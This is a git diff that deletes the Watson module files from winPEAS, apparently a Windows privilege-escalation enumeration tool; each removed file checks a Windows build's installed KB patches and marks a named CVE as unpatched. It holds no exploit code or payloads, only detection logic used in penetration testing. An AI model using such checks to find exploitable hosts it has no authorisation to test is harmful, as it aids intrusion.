diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-0836.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-0836.cs deleted file mode 100644 index 8ea6638..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-0836.cs +++ /dev/null @@ -1,105 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_0836 - { - private const string name = "CVE-2019-0836"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 10240: - - supersedence.AddRange(new int[] { - 4493475, 4498375, 4499154, 4505051, 4503291, - 4507458, 4512497, 4517276, 4522009, 4520011, - 4524153, 4525232, 4530681, 4534306, 4537776, - 4540693, 4550930, 4556826, 4561649, 4567518, - 4565513, 4571692, 4577049 - }); - - break; - - case 14393: - - supersedence.AddRange(new int[] { - 4493470, 4499418, 4494440, 4534271, 4534307, - 4537764, 4537806, 4540670, 4541329, 4550929, - 4550947, 4556813, 4561616, 4567517, 4565511, - 4571694, 4577015 - }); - - break; - - case 15063: - - supersedence.AddRange(new int[] { - 4493474, 4493436, 4499162, 4499181, 4502112, - 4505055, 4503279, 4503289, 4509476, 4507450, - 4507467, 4512474, 4512507, 4516059, 4516068, - 4522011, 4520010, 4524151, 4525245, 4530711, - 4534296, 4537765, 4540705, 4550939, 4556804, - 4561605, 4567516, 4565499, 4571689, 4577021 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4493441, 4493440, 4499147, 4499179, 4505062, - 4503281, 4503284, 4509477, 4507455, 4507465, - 4512494, 4512516, 4516066, 4522012, 4520004, - 4520006, 4524150, 4525241, 4530714, 4534276, - 4534318, 4537789, 4537816, 4540681, 4541330, - 4554342, 4550927, 4556812, 4561602, 4567515, - 4565508, 4571741, 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4493464, 4493437, 4499167, 4499183, 4505064, - 4503286, 4503288, 4509478, 4507435, 4507466, - 4512501, 4512509, 4516045, 4516058, 4522014, - 4519978, 4520008, 4524149, 4525237, 4530717, - 4534293, 4534308, 4537762, 4537795, 4540689, - 4541333, 4554349, 4550922, 4550944, 4556807, - 4561621, 4567514, 4565489, 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4493509, 4495667, 4494441, 4497934, 4501835, - 4505056, 4501371, 4503327, 4509479, 4505658, - 4507469, 4511553, 4512534, 4512578, 4522015, - 4519338, 4520062, 4524148, 4523205, 4530715, - 4534273, 4534321, 4532691, 4537818, 4538461, - 4541331, 4554354, 4549949, 4550969, 4551853, - 4561608, 4567513, 4558998, 4559003, 4565349, - 4571748, 4570333, 4577069 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-0841.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-0841.cs deleted file mode 100644 index 9aaffcd..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-0841.cs +++ /dev/null @@ -1,82 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_0841 - { - private const string name = "CVE-2019-0841"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 15063: - - supersedence.AddRange(new int[] { - 4493474, 4493436, 4499162, 4499181, 4502112, - 4505055, 4503279, 4503289, 4509476, 4507450, - 4507467, 4512474, 4512507, 4516059, 4516068, - 4522011, 4520010, 4524151, 4525245, 4530711, - 4534296, 4537765, 4540705, 4550939, 4556804, - 4561605, 4567516, 4565499, 4571689, 4577021 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4493441, 4493440, 4499147, 4499179, 4505062, - 4503281, 4503284, 4509477, 4507455, 4507465, - 4512494, 4512516, 4516066, 4522012, 4520004, - 4520006, 4524150, 4525241, 4530714, 4534276, - 4534318, 4537789, 4537816, 4540681, 4541330, - 4554342, 4550927, 4556812, 4561602, 4567515, - 4565508, 4571741, 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4493464, 4493437, 4499167, 4499183, 4505064, - 4503286, 4503288, 4509478, 4507435, 4507466, - 4512501, 4512509, 4516045, 4516058, 4522014, - 4519978, 4520008, 4524149, 4525237, 4530717, - 4534293, 4534308, 4537762, 4537795, 4540689, - 4541333, 4554349, 4550922, 4550944, 4556807, - 4561621, 4567514, 4565489, 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4493509, 4495667, 4494441, 4497934, 4501835, - 4505056, 4501371, 4503327, 4509479, 4505658, - 4507469, 4511553, 4512534, 4512578, 4522015, - 4519338, 4520062, 4524148, 4523205, 4530715, - 4534273, 4534321, 4532691, 4537818, 4538461, - 4541331, 4554354, 4549949, 4550969, 4551853, - 4561608, 4567513, 4558998, 4559003, 4565349, - 4571748, 4570333, 4577069 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1064.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1064.cs deleted file mode 100644 index c1257c5..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1064.cs +++ /dev/null @@ -1,102 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_1064 - { - private const string name = "CVE-2019-1064"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 14393: - - supersedence.AddRange(new int[] { - 4503267, 4503294, 4509475, 4507459, 4507460, - 4512495, 4512517, 4516044, 4516061, 4522010, - 4519998, 4524152, 4525236, 4530689 - }); - - break; - - case 15063: - - supersedence.AddRange(new int[] { - 4503279, 4503289, 4509476, 4507450, 4507467, - 4512474, 4512507, 4516059, 4516068, 4522011, - 4520010, 4524151, 4525245, 4530711, 4534296, - 4537765, 4540705, 4550939, 4556804, 4561605, - 4567516, 4565499, 4571689, 4577021 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4503284, 4503281, 4509477, 4507455, 4507465, - 4512494, 4512516, 4516066, 4522012, 4520004, - 4520006, 4524150, 4525241, 4530714, 4534276, - 4534318, 4537789, 4537816, 4540681, 4541330, - 4554342, 4550927, 4556812, 4561602, 4567515, - 4565508, 4571741, 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4503286, 4503288, 4509478, 4507435, 4507466, - 4512501, 4512509, 4516045, 4516058, 4522014, - 4519978, 4520008, 4524149, 4525237, 4530717, - 4534293, 4534308, 4537762, 4537795, 4540689, - 4541333, 4554349, 4550922, 4550944, 4556807, - 4561621, 4567514, 4565489, 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4503327, 4501371, 4509479, 4505658, 4507469, - 4511553, 4512534, 4512578, 4522015, 4519338, - 4520062, 4524148, 4523205, 4530715, 4534273, - 4534321, 4532691, 4537818, 4538461, 4541331, - 4554354, 4549949, 4550969, 4551853, 4561608, - 4567513, 4558998, 4559003, 4565349, 4571748, - 4570333, 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4503293, 4501375, 4505903, 4507453, 4512508, - 4512941, 4515384, 4517211, 4522016, 4517389, - 4522355, 4524147, 4524570, 4530684, 4528760, - 4532695, 4532693, 4535996, 4540673, 4541335, - 4551762, 4554364, 4549951, 4550945, 4556799, - 4560960, 4567512, 4565483, 4559004, 4565351, - 4566116, 4574727, 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1130.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1130.cs deleted file mode 100644 index 8114b77..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1130.cs +++ /dev/null @@ -1,109 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_1130 - { - private const string name = "CVE-2019-1130"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 10240: - - supersedence.AddRange(new int[] { - 4507458, 4512497, 4517276, 4522009, 4520011, - 4524153, 4525232, 4530681, 4534306, 4537776, - 4540693, 4550930, 4556826, 4561649, 4567518, - 4565513, 4571692, 4577049 - }); - - break; - - case 14393: - - supersedence.AddRange(new int[] { - 4507460, 4507459, 4512495, 4512517, 4516044, - 4516061, 4522010, 4519998, 4524152, 4525236, - 4530689 - }); - - break; - - case 15063: - - supersedence.AddRange(new int[] { - 4507460, 4507459, 4512495, 4512517, 4516044, - 4516061, 4522010, 4519998, 4524152, 4525236, - 4530689 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4507455, 4507465, 4512494, 4512516, 4516066, - 4522012, 4520004, 4520006, 4524150, 4525241, - 4530714, 4534276, 4534318, 4537789, 4537816, - 4540681, 4541330, 4554342, 4550927, 4556812, - 4561602, 4567515, 4565508, 4571741, 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4507435, 4507466, 4512501, 4512509, 4516045, - 4516058, 4522014, 4519978, 4520008, 4524149, - 4525237, 4530717, 4534293, 4534308, 4537762, - 4537795, 4540689, 4541333, 4554349, 4550922, - 4550944, 4556807, 4561621, 4567514, 4565489, - 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4507469, 4505658, 4511553, 4512534, 4512578, - 4522015, 4519338, 4520062, 4524148, 4523205, - 4530715, 4534273, 4534321, 4532691, 4537818, - 4538461, 4541331, 4554354, 4549949, 4550969, - 4551853, 4561608, 4567513, 4558998, 4559003, - 4565349, 4571748, 4570333, 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4507453, 4505903, 4512508, 4512941, 4515384, - 4517211, 4522016, 4517389, 4522355, 4524147, - 4524570, 4530684, 4528760, 4532695, 4532693, - 4535996, 4540673, 4541335, 4551762, 4554364, - 4549951, 4550945, 4556799, 4560960, 4567512, - 4565483, 4559004, 4565351, 4566116, 4574727, - 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1253.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1253.cs deleted file mode 100644 index 72078b5..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1253.cs +++ /dev/null @@ -1,86 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_1253 - { - private const string name = "CVE-2019-1253"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 15063: - - supersedence.AddRange(new int[] { - 4516068, 4516059, 4522011, 4520010, 4524151, - 4525245, 4530711, 4534296, 4537765, 4540705, - 4550939, 4556804, 4561605, 4567516, 4565499, - 4571689, 4577021 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4516066, 4522012, 4520004, 4520006, 4524150, - 4525241, 4530714, 4534276, 4534318, 4537789, - 4537816, 4540681, 4541330, 4554342, 4550927, - 4556812, 4561602, 4567515, 4565508, 4571741, - 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4516058, 4516045, 4522014, 4519978, 4520008, - 4524149, 4525237, 4530717, 4534293, 4534308, - 4537762, 4537795, 4540689, 4541333, 4554349, - 4550922, 4550944, 4556807, 4561621, 4567514, - 4565489, 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4512578, 4522015, 4519338, 4520062, 4524148, - 4523205, 4530715, 4534273, 4534321, 4532691, - 4537818, 4538461, 4541331, 4554354, 4549949, - 4550969, 4551853, 4561608, 4567513, 4558998, - 4559003, 4565349, 4571748, 4570333, 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4515384, 4517211, 4522016, 4517389, 4522355, - 4524147, 4524570, 4530684, 4528760, 4532695, - 4532693, 4535996, 4540673, 4541335, 4551762, - 4554364, 4549951, 4550945, 4556799, 4560960, - 4567512, 4565483, 4559004, 4565351, 4566116, - 4574727, 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1315.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1315.cs deleted file mode 100644 index 1347d17..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1315.cs +++ /dev/null @@ -1,100 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_1315 - { - private const string name = "CVE-2019-1315"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 10240: - - supersedence.AddRange(new int[] { - 4520011, 4525232, 4530681, 4534306, 4537776, - 4540693, 4550930, 4556826, 4561649, 4567518, - 4565513, 4571692, 4577049 - }); - - break; - - case 14393: - - supersedence.AddRange(new int[] { - 4519998, 4519979, 4525236, 4530689 - }); - - break; - - case 15063: - - supersedence.AddRange(new int[] { - 4520010, 4525245, 4530711, 4534296, 4537765, - 4540705, 4550939, 4556804, 4561605, 4567516, - 4565499, 4571689, 4577021 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4520004, 4520006, 4525241, 4530714, 4534276, - 4534318, 4537789, 4537816, 4540681, 4541330, - 4554342, 4550927, 4556812, 4561602, 4567515, - 4565508, 4571741, 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4520008, 4519978, 4525237, 4530717, 4534293, - 4534308, 4537762, 4537795, 4540689, 4541333, - 4554349, 4550922, 4550944, 4556807, 4561621, - 4567514, 4565489, 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4519338, 4520062, 4523205, 4530715, 4534273, - 4534321, 4532691, 4537818, 4538461, 4541331, - 4554354, 4549949, 4550969, 4551853, 4561608, - 4567513, 4558998, 4559003, 4565349, 4571748, - 4570333, 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4517389, 4522355, 4524570, 4530684, 4528760, - 4532695, 4532693, 4535996, 4540673, 4541335, - 4551762, 4554364, 4549951, 4550945, 4556799, - 4560960, 4567512, 4565483, 4559004, 4565351, - 4566116, 4574727, 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1385.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1385.cs deleted file mode 100644 index e389748..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1385.cs +++ /dev/null @@ -1,83 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_1385 - { - private const string name = "CVE-2019-1385"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 16299: - - supersedence.AddRange(new int[] { - 4525241, 4530714, 4534276, 4534318, 4537789, - 4537816, 4540681, 4541330, 4554342, 4550927, - 4556812, 4561602, 4567515, 4565508, 4571741, - 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4525237, 4530717, 4534293, 4534308, 4537762, - 4537795, 4540689, 4541333, 4554349, 4550922, - 4550944, 4556807, 4561621, 4567514, 4565489, - 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4523205, 4530715, 4534273, 4534321, 4532691, - 4537818, 4538461, 4541331, 4554354, 4549949, - 4550969, 4551853, 4561608, 4567513, 4558998, - 4559003, 4565349, 4571748, 4570333, 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4524570, 4530684, 4528760, 4532695, 4532693, - 4535996, 4540673, 4541335, 4551762, 4554364, - 4549951, 4550945, 4556799, 4560960, 4567512, - 4565483, 4559004, 4565351, 4566116, 4574727, - 4577062 - }); - - break; - - case 18363: - - supersedence.AddRange(new int[] { - 4524570, 4530684, 4528760, 4532695, 4532693, - 4535996, 4540673, 4541335, 4551762, 4554364, - 4549951, 4550945, 4556799, 4560960, 4567512, - 4565483, 4559004, 4565351, 4566116, 4574727, - 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1388.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1388.cs deleted file mode 100644 index 6c1daea..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1388.cs +++ /dev/null @@ -1,89 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_1388 - { - private const string name = "CVE-2019-1388"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 10240: - - supersedence.AddRange(new int[] { - 4525232, 4530681, 4534306, 4537776, 4540693, - 4550930, 4556826, 4561649, 4567518, 4565513, - 4571692, 4577049 - }); - - break; - - case 14393: - - supersedence.AddRange(new int[] { - 4525236, 4530689 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4525241, 4530714, 4534276, 4534318, 4537789, - 4537816, 4540681, 4541330, 4554342, 4550927, - 4556812, 4561602, 4567515, 4565508, 4571741, - 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4525237, 4530717, 4534293, 4534308, 4537762, - 4537795, 4540689, 4541333, 4554349, 4550922, - 4550944, 4556807, 4561621, 4567514, 4565489, - 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4523205, 4530715, 4534273, 4534321, 4532691, - 4537818, 4538461, 4541331, 4554354, 4549949, - 4550969, 4551853, 4561608, 4567513, 4558998, - 4559003, 4565349, 4571748, 4570333, 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4524570, 4530684, 4528760, 4532695, 4532693, - 4535996, 4540673, 4541335, 4551762, 4554364, - 4549951, 4550945, 4556799, 4560960, 4567512, - 4565483, 4559004, 4565351, 4566116, 4574727, - 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1405.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1405.cs deleted file mode 100644 index 5ba7aa6..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1405.cs +++ /dev/null @@ -1,101 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2019_1405 - { - private const string name = "CVE-2019-1405"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 10240: - - supersedence.AddRange(new int[] { - 4525232, 4530681, 4534306, 4537776, 4540693, - 4550930, 4556826, 4561649, 4567518, 4565513, - 4571692, 4577049 - }); - - break; - - case 14393: - - supersedence.AddRange(new int[] { - 4525236, 4530689 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4525241, 4530714, 4534276, 4534318, 4537789, - 4537816, 4540681, 4541330, 4554342, 4550927, - 4556812, 4561602, 4567515, 4565508, 4571741, - 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4525237, 4530717, 4534293, 4534308, 4537762, - 4537795, 4540689, 4541333, 4554349, 4550922, - 4550944, 4556807, 4561621, 4567514, 4565489, - 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4523205, 4530715, 4534273, 4534321, 4532691, - 4537818, 4538461, 4541331, 4554354, 4549949, - 4550969, 4551853, 4561608, 4567513, 4558998, - 4559003, 4565349, 4571748, 4570333, 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4524570, 4530684, 4528760, 4532695, 4532693, - 4535996, 4540673, 4541335, 4551762, 4554364, - 4549951, 4550945, 4556799, 4560960, 4567512, - 4565483, 4559004, 4565351, 4566116, 4574727, - 4577062 - }); - - break; - - case 18363: - - supersedence.AddRange(new int[] { - 4524570, 4530684, 4528760, 4532695, 4532693, - 4535996, 4540673, 4541335, 4551762, 4554364, - 4549951, 4550945, 4556799, 4560960, 4567512, - 4565483, 4559004, 4565351, 4566116, 4574727, - 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0668.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0668.cs deleted file mode 100644 index 6918ebf..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0668.cs +++ /dev/null @@ -1,98 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2020_0668 - { - private const string name = "CVE-2020-0668"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 10240: - - supersedence.AddRange(new int[] { - 4537776, 4540693, 4550930, 4556826, 4561649, - 4567518, 4565513, 4571692, 4577049 - }); - - break; - - case 14393: - - supersedence.AddRange(new int[] { - 4537764, 4537806, 4540670, 4541329, 4550929, - 4550947, 4556813, 4561616, 4567517, 4565511, - 4571694, 4577015 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4537789, 4537816, 4540681, 4541330, 4554342, - 4550927, 4556812, 4561602, 4567515, 4565508, - 4571741, 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4537762, 4537795, 4540689, 4541333, 4554349, - 4550922, 4550944, 4556807, 4561621, 4567514, - 4565489, 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4532691, 4537818, 4538461, 4541331, 4554354, - 4549949, 4550969, 4551853, 4561608, 4567513, - 4558998, 4559003, 4565349, 4571748, 4570333, - 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4532693, 4535996, 4540673, 4541335, 4551762, - 4554364, 4549951, 4550945, 4556799, 4560960, - 4567512, 4565483, 4559004, 4565351, 4566116, - 4574727, 4577062 - }); - - break; - - case 18363: - - supersedence.AddRange(new int[] { - 4532693, 4535996, 4540673, 4541335, 4551762, - 4554364, 4549951, 4550945, 4556799, 4560960, - 4567512, 4565483, 4559004, 4565351, 4566116, - 4574727, 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0683.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0683.cs deleted file mode 100644 index 89d9d36..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0683.cs +++ /dev/null @@ -1,98 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2020_0683 - { - private const string name = "CVE-2020-0683"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 10240: - - supersedence.AddRange(new int[] { - 4537776, 4540693, 4550930, 4556826, 4561649, - 4567518, 4565513, 4571692, 4577049 - }); - - break; - - case 14393: - - supersedence.AddRange(new int[] { - 4537764, 4537806, 4540670, 4541329, 4550929, - 4550947, 4556813, 4561616, 4567517, 4565511, - 4571694, 4577015 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4537789, 4537816, 4540681, 4541330, 4554342, - 4550927, 4556812, 4561602, 4567515, 4565508, - 4571741, 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4537762, 4537795, 4540689, 4541333, 4554349, - 4550922, 4550944, 4556807, 4561621, 4567514, - 4565489, 4571709, 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4532691, 4537818, 4538461, 4541331, 4554354, - 4549949, 4550969, 4551853, 4561608, 4567513, - 4558998, 4559003, 4565349, 4571748, 4570333, - 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4532693, 4535996, 4540673, 4541335, 4551762, - 4554364, 4549951, 4550945, 4556799, 4560960, - 4567512, 4565483, 4559004, 4565351, 4566116, - 4574727, 4577062 - }); - - break; - - case 18363: - - supersedence.AddRange(new int[] { - 4532693, 4535996, 4540673, 4541335, 4551762, - 4554364, 4549951, 4550945, 4556799, 4560960, - 4567512, 4565483, 4559004, 4565351, 4566116, - 4574727, 4577062 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0796.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0796.cs deleted file mode 100644 index 3990b7c..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0796.cs +++ /dev/null @@ -1,35 +0,0 @@ -using System.Linq; -using System.Collections.Generic; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2020_0796 - { - private const string name = "CVE-2020-0796"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 18362: - case 18363: - - supersedence.AddRange(new int[] { - 4551762 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-1013.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-1013.cs deleted file mode 100644 index 66a7bdc..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-1013.cs +++ /dev/null @@ -1,90 +0,0 @@ -using System.Collections.Generic; -using System.Linq; - -namespace winPEAS._3rdParty.Watson.Msrc -{ - internal static class CVE_2020_1013 - { - private const string name = "CVE-2020-1013"; - - public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List installedKBs) - { - var supersedence = new List(); - - switch (buildNumber) - { - case 10240: - - supersedence.AddRange(new int[] { - 4577049 - }); - - break; - - case 14393: - - supersedence.AddRange(new int[] { - 4577015 - }); - - break; - - case 16299: - - supersedence.AddRange(new int[] { - 4577041 - }); - - break; - - case 17134: - - supersedence.AddRange(new int[] { - 4577032 - }); - - break; - - case 17763: - - supersedence.AddRange(new int[] { - 4570333, 4577069 - }); - - break; - - case 18362: - - supersedence.AddRange(new int[] { - 4574727, 4577062 - }); - - break; - - case 18363: - - supersedence.AddRange(new int[] { - 4574727, 4577062 - }); - - break; - - case 19041: - - supersedence.AddRange(new int[] { - 4571756, 4577063 - }); - - break; - - default: - return; - } - - if (!supersedence.Intersect(installedKBs).Any()) - { - vulnerabilities.SetAsVulnerable(name); - } - } - } -} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Vulnerability.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Vulnerability.cs deleted file mode 100644 index 1c39789..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Vulnerability.cs +++ /dev/null @@ -1,18 +0,0 @@ 